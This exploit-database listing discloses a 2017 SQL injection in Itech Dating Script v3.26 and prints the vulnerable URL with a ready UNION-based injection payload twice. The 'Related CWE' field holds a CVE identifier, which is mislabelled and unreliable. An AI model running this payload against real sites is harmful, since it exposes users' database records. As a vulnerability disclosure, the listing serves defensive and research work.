header-logo
Suggest Exploit
vendor:
Itech Dating Script
by:
Kaan KAMIS
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Itech Dating Script
Affected Version From: 3.26
Affected Version To: 3.26
Patch Exists: YES
Related CWE: CVE-2017-5123
CPE: a:itechscripts:itech_dating_script:3.26
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2017

Itech Dating Script v3.26 – SQL Injection

An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read arbitrary data from the database. URL : http://localhost/see_more_details.php?id=40[payload] Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 29 columns Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

Exploit Title: Itech Dating Script v3.26 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/dating-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.

Type of vulnerability:

An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
arbitrary data from the database.

Vulnerability:

URL : http://localhost/see_more_details.php?id=40[payload]

Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs

Navigation

Suggest Exploit

Services By CQR